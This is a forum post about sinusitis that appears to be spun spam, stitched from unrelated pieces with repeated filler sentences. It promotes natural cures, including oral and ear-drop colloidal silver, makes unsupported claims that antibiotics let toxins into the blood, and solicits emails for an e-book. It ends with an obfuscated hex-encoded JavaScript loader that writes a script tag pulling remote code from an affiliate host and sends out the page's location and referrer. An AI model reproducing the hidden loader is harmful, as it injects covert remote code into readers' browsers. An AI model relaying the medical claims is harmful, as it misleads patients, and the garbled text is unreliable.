Sinus Condition

View previous topic View next topic Go down

Sinus Condition

Post by Admin on Sat Oct 01, 2016 12:41 am

Sinus Condition: Facts about Sinusitis

Paranasal sinuses are air-filled sacs present within the bones of the skull and face. These sinuses are located on either sides of the nasal cavity. There are four different types of paranasal sinuses in humans depending on their location. These include frontal, ethmoid, maxillary and sphenoid. All these types of sinuses are connected with the nose through narrow channels called ostia. Paranasal sinuses are helpful in providing shape to facial bones. However, the most important function of paranasal sinuses is to act as a resonance box or a sponge and prevent echoes that may reverberate in the skull when a person speaks. Other important functions include proper circulation of air inside the skull providing an air-conditioning effect, making the skull light in weight and helping in pronouncing nasal consonants.

Inflammation in the mucous lining surrounding the nose results in formation of thick nasal discharge. When the infection spreads to sinus cavities, mucus is formed within the sinus that gets drained into the nose through narrow channels. As the mucus thickens, it blocks the sinus passage resulting in fluid and mucus accumulation inside the sinus, a condition termed as sinusitis. Sinusitis can occur as a result of an infection in the upper respiratory tract, dental sepsis or an ear infection. Other contributing factors include changes in atmospheric pressure, swimming, environmental pollutants, prolonged exposure to cold temperatures, a facial injury, allergies, asthma, nasal polyps, nasal deformities, cleft palate and adenoids. It is always better to use simple English when writing descriptive articles, like this one on Sinuses. It is the layman who may read such articles, and if he can't understand it, what is the point of writing it?

Symptoms of sinusitis are nasal obstruction, swollen nasal passages, pain around the eyes and cheeks, thick nasal discharge that is yellow or green colored, facial swelling, puffiness around the eyes, and pus formation in the affected area, cold and cough with sore throat. Symptoms of sinusitis are predominantly present during early morning hours and gradually reduce in the afternoon. Also, conditions such as damp weather, sudden change in temperature and cough can aggravate sinusitis. Very Happy.

During my years of research for Earache prevention, I found that repeated allergies, sinus, and ear infections are the result of a "weakened immune system" mainly due to "antibiotic overuse." Antibiotics kill good and bad bacteria in the colon resulting in poor digestion and impaired absorption of nutrients. So even when I gave my son a healthy diet and vitamin supplements, he was still having chronic earaches and sinusitis, because he was not absorbing needed nutrients to keep his immune system healthy and strong. Laughing

• This is because allergic kids usually have problems digesting proteins and lack 'protease', which is an enzyme needed for protein digestion.
  • In addition, allergic kids have trouble removing the metabolic waste from protein digestion due to enzyme deficiency.
  • Last and most important is the fact that milk products produce excess flem and mucous in throat and sinuses.

Simple remedy is to supplement with Lactobacillus Acidophilus (friendly flora), which is a good bacteria that will repair the mucosa by replenishing the natural balance of friendly flora in the colon that the antibiotics has destroyed. For supplement info see link below. Rolling Eyes

• Other helpful strategies include: Drink more water and eat more fresh unprocessed foods.
  • Get thirty minutes of exercise and sunshine each day.

One of the Most Common Processed Foods to Eliminate is White Sugar

Excess dietary sugar is toxic to the body and promotes fungal infections in the gut, ear, nose and throat. Many chronic earaches and sinus problems are actually fungal infections. Instead use an All-Natural Sugar substitute that is safe for kids called Xylitol. In fact, Xylitol actually prevents infections.

Addition to impaired absorption, antibiotics damage the mucosa (the inner lining of the small intestines) so toxins that should normally exit the body, get absorbed into the blood stream instead. Toxins in the blood stream can cause various allergic reactions such as hives, body aches, sneezing, itching, and a runny nose. Runny noses and fluid buildup provide the breeding ground for bacterial ear infections. Enhancing your vocabulary is our intention with the writing of this article on Sinus Infections Com. We have used new and interesting words to achieve this.

Other factors that wear down the immune system are: Stress Poor diet Lack of sleep Food allergies Food additives Food preservatives Environmental toxins Toxins from protein digestion

There are Thousands of Man-Made Chemicals Today that Did Not Exist a Hundred Years Ago

Today our children's immune systems are overloaded with toxins and have to work harder to remove them. Working overtime causes the immune system to run out of essential elements (necessary oils and enzymes), which are the fuel it needs to carry on. When your tank is out of gas you fill it up, right? And likewise, our immune system is no different. To fuel up we need "basic building blocks" called "amino acids" (protein) and "essential oils" (omega in order to strengthen the immune system heal chronic diseases. Toxic overload without regular refueling will cause the immune system and the liver to burnout out. The end result is low "immune system function." We have not included any imaginary or false information on Sinus here. Everything here is true and up to the mark!

IMPROVED DIGESTION AND ABSORPTION = BETTER NUTRITION = HEALTHY IMMUNE SYSTEM More information is available here: ***** I will also send you a free e-book about natural cures upon your request. Send request to: scott@natural-cures-ear-sinus-infections.com Embarassed

Short-Term Healing can be Achieved by:

Adding all-natural antibiotics in addition to your doctor's care. Natural antibiotics (colloidal silver) can be administered both topically (ear drops & sinus sprays) and orally. My experience when using natural antibiotic eardrops is that ear pain is gone usually within an hour. Making a fresh juice cocktail of carrots, apples, beets, and spinach gives 'superior nutrition' and tons of antioxidants very quickly. Giving lactobacillus acidophilus to restore floral balance in the colon. Using our imagination has helped us create a wonderful article on Sinus Infections Com. Being imaginative is indeed very important when writing about Sinus Infections Com!

The Goal to Long-Term Healing is to Get the Immune System Strong Again

First, by improving digestion using natural digestive enzymes thus improving absorption of nutrients. Second, is to identify and remove allergens. Research shows that the vast majority of kids with chronic earaches & sinus infections are allergic to wheat, diary, and beef. So eliminating or reducing these foods will bring help bring healing. Alternative food choices are yogurt, soymilk, lactaid milk, rice, oats, and etc. Third, limiting or eliminating proteins from cow products and replacing them with easily digestible proteins such as yogurt, beans, and whey protein powder drinks. Protein powder drinks are chock full of essential and nonessential amino acids that do not need to be digested only absorbed, are very helpful because protein drink mixes are quick and easy to fix. Why should you eliminate cow proteins?

• Exercise creates enzymes in the mitochondria of cells to burn fat, burning fat = getting rid of toxins from the body.
  • For more information see link below and email me for a free e-book.
  • Sunshine is needed for the body to make Vitamin D3.
  • Most kids and elderly folks cannot convert Vitamin D2 supplements into D3 the active form in the body, so their immune system is lacking vitamin D3.
  • D3 is necessary to help the immune system recognize & fight invaders.
  • Even the beginner will get to learn more about Sinusitis after reading this article.
  • It is written in easy language so that everyone will be able to understand it.
  • Cutting back on processed foods that have toxic food additives and preservatives can make a huge difference in the health of you and your child.
  • Replace processed foods with whole fruits, grains, and vegetables.
  • You will be surprised how much better your child will feel.
  • In addition, their attention span will improve and hyperactivity will be diminished.

Herbal Immune Balance Sinus - 60 Vegetarian Capsules - Garden of Life

Sinusitis is an inflammation or infection of the air pockets on either side of and behind the nose. It is traditionally subdivided into acute , subacute , and chronic. It can be caused by bacteria, viruses, fungi (molds) and possibly by allergies. About 15-20 % of the population has a chronic sinusitis (meaning lasting longer than 3 weeks). It can cause a tremendous amount of suffering. Acute sinusitis is usually precipitated by an earlier upper respiratory tract infection, generally of viral origin. Virally damaged surface tissues are then colonized by bacteria, most commonly Haemophilus influenzae, Streptococcus pneumoniae, Moraxella catarrhalis and Staphylococcus aureus. Chronic sinusitis, sinusitis that persists for at least 3 weeks, affects an estimated 32 million people in the United States.

Saline Nasal Sprays and Vaporizers can Also Help

Apply moist heat by holding a warm, wet towel against your face or breathing in steam through a cloth or towel. Don't use a nose spray with a decongestant in it for more than 3 days. If you use it for more than 3 days, the swelling in your sinuses may get worse when you stop the medicine. Sip hot liquids and drink plenty of fluids. Surgery should be considered only if medical treatment fails or if there is a nasal obstruction that cannot be corrected with medications. If you have allergies, try to avoid contact with things that trigger attacks. Drinking plenty of fluids to keep nasal discharge thin. Avoiding air travel. If you must fly, use a nasal spray decongestant before take-off to prevent blockage of the sinuses allowing mucus to drain. It was with keen interest that we got about to writing on Sinusitis. Hope you read and appreciate it with equal interest.

Sinusitis Treatment and Prevention Tips

1. Vitamin C is also herbal home remedies for sinus infection. 2. Vitamins like A and C are very much responsible to treat and to prevent sinusitis.

Americans spend millions of dollars each year for medications that promise relief from their sinus symptoms. The causes are multifactorial and may include allergy, environmental factors such as dust or pollution, bacterial infection, or fungus (either allergic, infective, or reactive). Non allergic factors such as Vasomotor rhinitis can also cause chronic sinus problems. Sinuses are hollow air spaces, of which there are many in the human body. Symptoms of sinusitis can include fever, weakness, fatigue, cough and congestion. There may also be mucus drainage in the back of the throat, called postnasal drip. Treatments include antibiotics, decongestants and pain relievers. Therapy for bacterial sinusitis should include an appropriate antibiotic.Using heat pads on the inflamed area. Embarassed

Drinking Plenty of Fluids to Keep Nasal Discharge Thin

6. Using an oral decongestant or a short course of nasal spray decongestant Aiming high is our motto when writing about any topic. In this way, we tend to add whatever matter there is about Sinusitis, rather than drop any topic.

• Don't use a nose spray with a decongestant in it for more than 3 days. 4.
  • Fenugreek is considered as most effective home remedy for sinusitis.

Regarding Surgery, Dr

Josephson was a pioneer in the procedure called FESS (Functional Endoscopic Sinus Surgery) which is now considered state of the art. This procedure uses an endoscope for both a diagnosis as well as during the surgical procedure. This gives the surgeon an excellent view of the area being worked on, and thus there is less bleeding, more accuracy, and packing is rarely necessary, which is very important. He says many of his patients simply go home and go to work the next day. I would have liked him to comment about endoscopic surgery using lasers as well, but he didn't make mention of that technique. People have told me that this laser procedure worked exceptionally well for them. Dr. Josephson is obviously totally committed to FESS, however, and with the micro tools he uses, he apparently is able to keep bleeding and pain levels low for patients, as is the case for endoscopic laser surgery. He also makes no comments about a new surgical procedure called sinuplasty, which is similar in concept to angioplasty. I would certainly like to hear his opinion of that new procedure.

He wrote at length about new research developments, especially the remarkable work done by Mayo Clinic researchers regarding the effects of fungus on sinusitis. Although the results are still somewhat controversial, this team has shown that an atypical immune response reaction to fungus in certain people to common fungus might be the root cause of sinusitis. The theory is growing in popularity and new topical anti-fungal medications are being developed. It is always better to use simple English when writing descriptive articles, like this one on Sinus Problems. It is the layman who may read such articles, and if he can't understand it, what is the point of writing it? Laughing

There has been a lot of progress made in the treatment of sinusitis in the past 5-10 years, and Dr. Josephson's book puts it together and brings us up to date. 'Sinus Relief Now' is certainly a great reference for anyone with CAID problems. There are descriptions of just about every medication used in any of the treatments, both prescription and OTC. I learned several things I didn't know before. For example, I didn't know that antihistimines are only effective against allergies. I thought they would simply prevent excess mucus forming in any case. Also, Dr. Josephson feels that decongestants should not be used long term but only for a week at a time as he believes they can cause problems if used for long periods. In general the book is almost a reference work for any type of respiratory or digestive condition. All sinus sufferers would do well to read 'Sinus Relief Now' and then to refer to it any time problems come up. It is the best sinus book I've ever read.

The Five Step Plan that Dr

Josephson recommends is presented at the end of the book. The steps are: 1. Take care of your sinuses through proper irrigation. We have used clear and concise words in this article on Sinus Treatment to avoid any misunderstandings and confusions that can be caused due to difficult words.

He emphasizes that eating the right foods can make a big difference, but he isn't totally dogmatic about it. I was turned off once by another book in which the author stated that one must simply give up certain foods if they wanted to get over sinusitis, and these included cheese, chocolate, wine and all other alcoholic beverages, among other things. For a person like me who lived for several years in France, this would be unbearable. I might mention what works for me French person it would be unthinkable. Keeping to the point is very important when writing. So we have to stuck to Endoscopic Sinus Surgery, and have not wandered much from it to enhance understanding.

Also included in the book is a discussion about the validity of alternative therapies, like acupuncture, holistic medicine, and chiropractic, for example. I think this is useful, and in fact a niece recently told me she had acupuncture treatments for her sinus problems and she was excited about how much better she felt. We have used a mixture of serious sinuses and jokes in this composition on Functional Endoscopic Sinus Surgery. This is to liven the mood when reading about Functional Endoscopic Sinus Surgery.

Clean Up Your Environment

Be vigilant about food choices Take your medication (i.e., take the entire prescription) Embrace life-altering changes and enjoy your health. Quality is better than quantity. It is of no use writing numerous pages of nonsense for the reader. Instead, it is better to write a short, and informative article on specific subjects like Functional Endoscopic Sinus Surgery. People tend to enjoy it more.

var c2="sinusitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

View user profile http://joshuabeasley.free-forums.tv

Back to top Go down

View previous topic View next topic Back to top